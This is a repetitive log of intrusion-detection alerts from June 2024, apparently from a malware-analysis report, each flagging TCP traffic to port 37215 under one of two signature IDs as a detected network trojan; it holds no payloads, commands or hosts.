              Timestamp:06/13/24-21:32:19.753569
              SID:2835222
              Source Port:56600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125335
              SID:2829579
              Source Port:38142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706931
              SID:2835222
              Source Port:56418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678678
              SID:2835222
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094027
              SID:2835222
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710017
              SID:2829579
              Source Port:52922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317106
              SID:2829579
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452024
              SID:2835222
              Source Port:56022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302379
              SID:2835222
              Source Port:48932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708826
              SID:2829579
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954777
              SID:2835222
              Source Port:35414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487592
              SID:2835222
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458353
              SID:2835222
              Source Port:43306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908240
              SID:2835222
              Source Port:59248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194693
              SID:2829579
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301877
              SID:2829579
              Source Port:59312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566675
              SID:2835222
              Source Port:60284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610712
              SID:2829579
              Source Port:57292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322893
              SID:2829579
              Source Port:58076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308960
              SID:2835222
              Source Port:47998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024086
              SID:2835222
              Source Port:56230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502966
              SID:2829579
              Source Port:57936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822890
              SID:2829579
              Source Port:52572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786304
              SID:2835222
              Source Port:36410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992127
              SID:2829579
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304818
              SID:2829579
              Source Port:37890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611516
              SID:2835222
              Source Port:46802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914378
              SID:2829579
              Source Port:56086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438285
              SID:2829579
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726843
              SID:2835222
              Source Port:50776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508672
              SID:2835222
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095924
              SID:2829579
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151723
              SID:2829579
              Source Port:43450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176733
              SID:2835222
              Source Port:45236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273221
              SID:2829579
              Source Port:47988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484534
              SID:2829579
              Source Port:56818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545722
              SID:2835222
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137112
              SID:2835222
              Source Port:36202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092941
              SID:2829579
              Source Port:54194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909738
              SID:2835222
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404932
              SID:2829579
              Source Port:48084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349021
              SID:2829579
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508043
              SID:2835222
              Source Port:48182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379815
              SID:2835222
              Source Port:51232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453106
              SID:2829579
              Source Port:40562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672199
              SID:2835222
              Source Port:35894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252238
              SID:2829579
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153156
              SID:2829579
              Source Port:57114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757697
              SID:2829579
              Source Port:50746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242462
              SID:2835222
              Source Port:34108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678627
              SID:2835222
              Source Port:43612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057823
              SID:2835222
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885081
              SID:2829579
              Source Port:42200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554063
              SID:2829579
              Source Port:51366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042388
              SID:2835222
              Source Port:58196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417201
              SID:2835222
              Source Port:38836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168777
              SID:2829579
              Source Port:51516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678020
              SID:2829579
              Source Port:35016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166086
              SID:2829579
              Source Port:34410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424382
              SID:2835222
              Source Port:50860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553289
              SID:2829579
              Source Port:45952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305142
              SID:2835222
              Source Port:50714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219607
              SID:2829579
              Source Port:40628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836499
              SID:2835222
              Source Port:59844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871878
              SID:2829579
              Source Port:58244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130401
              SID:2829579
              Source Port:52570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158249
              SID:2829579
              Source Port:51038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503312
              SID:2835222
              Source Port:55714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438463
              SID:2829579
              Source Port:34506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694615
              SID:2829579
              Source Port:60506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613802
              SID:2829579
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131026
              SID:2829579
              Source Port:38824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101632
              SID:2835222
              Source Port:57030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629376
              SID:2835222
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166626
              SID:2835222
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356166
              SID:2835222
              Source Port:54016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629754
              SID:2829579
              Source Port:34506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109138
              SID:2829579
              Source Port:54346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974332
              SID:2829579
              Source Port:50132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343541
              SID:2829579
              Source Port:40178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241735
              SID:2835222
              Source Port:51476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989451
              SID:2835222
              Source Port:43122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128179
              SID:2829579
              Source Port:49080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258729
              SID:2835222
              Source Port:57670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657121
              SID:2835222
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024477
              SID:2835222
              Source Port:58428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129128
              SID:2829579
              Source Port:41638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458477
              SID:2829579
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126341
              SID:2829579
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871786
              SID:2835222
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373957
              SID:2835222
              Source Port:43268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024422
              SID:2835222
              Source Port:36744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631380
              SID:2835222
              Source Port:37706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127314
              SID:2829579
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150745
              SID:2829579
              Source Port:54886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544714
              SID:2829579
              Source Port:50246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090062
              SID:2829579
              Source Port:38194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229135
              SID:2835222
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912888
              SID:2835222
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991553
              SID:2835222
              Source Port:53914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453153
              SID:2829579
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016757
              SID:2829579
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255960
              SID:2835222
              Source Port:38992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417923
              SID:2829579
              Source Port:47972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244247
              SID:2829579
              Source Port:47788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528369
              SID:2829579
              Source Port:59034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246668
              SID:2829579
              Source Port:43588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091729
              SID:2829579
              Source Port:53772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421006
              SID:2835222
              Source Port:47676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630060
              SID:2829579
              Source Port:55724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309441
              SID:2835222
              Source Port:42034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801073
              SID:2829579
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245799
              SID:2835222
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130208
              SID:2829579
              Source Port:47806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220803
              SID:2835222
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457557
              SID:2829579
              Source Port:48356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276612
              SID:2835222
              Source Port:38046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635102
              SID:2835222
              Source Port:58364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088402
              SID:2835222
              Source Port:41746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785039
              SID:2829579
              Source Port:51252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087409
              SID:2829579
              Source Port:54752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457196
              SID:2835222
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043010
              SID:2835222
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231432
              SID:2835222
              Source Port:34532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348981
              SID:2829579
              Source Port:58360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323897
              SID:2829579
              Source Port:45936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657154
              SID:2835222
              Source Port:55098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710468
              SID:2829579
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940658
              SID:2829579
              Source Port:54490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048284
              SID:2835222
              Source Port:47752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790323
              SID:2835222
              Source Port:36490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017361
              SID:2829579
              Source Port:33116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841060
              SID:2829579
              Source Port:53214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630013
              SID:2835222
              Source Port:41536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657950
              SID:2829579
              Source Port:35378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231828
              SID:2829579
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886379
              SID:2829579
              Source Port:52264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611385
              SID:2835222
              Source Port:41940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753345
              SID:2835222
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614795
              SID:2829579
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158384
              SID:2835222
              Source Port:55198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088572
              SID:2829579
              Source Port:47278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270943
              SID:2835222
              Source Port:56376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657293
              SID:2829579
              Source Port:45552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708902
              SID:2829579
              Source Port:38032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046095
              SID:2829579
              Source Port:48872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656407
              SID:2829579
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821735
              SID:2829579
              Source Port:52542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271774
              SID:2835222
              Source Port:47634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908940
              SID:2835222
              Source Port:51358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092534
              SID:2829579
              Source Port:36094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697487
              SID:2835222
              Source Port:50544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545540
              SID:2835222
              Source Port:44176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378305
              SID:2829579
              Source Port:39350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754451
              SID:2829579
              Source Port:50800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354923
              SID:2835222
              Source Port:60530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132791
              SID:2835222
              Source Port:39558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989529
              SID:2835222
              Source Port:56834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109466
              SID:2835222
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166681
              SID:2835222
              Source Port:40882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657343
              SID:2829579
              Source Port:56370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940609
              SID:2835222
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569251
              SID:2829579
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158199
              SID:2829579
              Source Port:46628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438550
              SID:2829579
              Source Port:49758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173346
              SID:2829579
              Source Port:57688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757866
              SID:2835222
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609684
              SID:2835222
              Source Port:35544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976881
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224723
              SID:2829579
              Source Port:43954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730578
              SID:2835222
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572448
              SID:2829579
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913860
              SID:2835222
              Source Port:57724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568874
              SID:2829579
              Source Port:38444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708128
              SID:2829579
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402759
              SID:2835222
              Source Port:38664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527539
              SID:2835222
              Source Port:46268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710156
              SID:2835222
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279237
              SID:2835222
              Source Port:50682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486448
              SID:2835222
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727874
              SID:2835222
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137475
              SID:2835222
              Source Port:47950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993569
              SID:2835222
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164941
              SID:2829579
              Source Port:33898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694777
              SID:2835222
              Source Port:48230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753799
              SID:2835222
              Source Port:53904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610515
              SID:2835222
              Source Port:57558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091211
              SID:2829579
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725647
              SID:2835222
              Source Port:47056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107562
              SID:2829579
              Source Port:36438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176171
              SID:2835222
              Source Port:47690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613260
              SID:2835222
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369124
              SID:2829579
              Source Port:35360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486507
              SID:2835222
              Source Port:49772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453693
              SID:2829579
              Source Port:40982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869450
              SID:2829579
              Source Port:42204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248858
              SID:2829579
              Source Port:60556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868131
